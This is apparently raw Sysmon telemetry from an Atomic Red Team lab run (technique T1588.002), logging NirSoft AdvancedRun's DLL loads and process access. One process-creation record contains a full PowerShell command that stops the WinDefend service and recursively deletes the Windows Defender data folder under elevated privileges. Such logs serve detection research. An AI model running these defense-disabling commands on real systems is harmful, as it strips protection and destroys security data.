17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003982918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003982915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003982914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003982913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7B04-000000002702}21802204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003982912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.619{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F464-61EA-7B04-000000002702}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003982911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003982906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.600{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003982905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 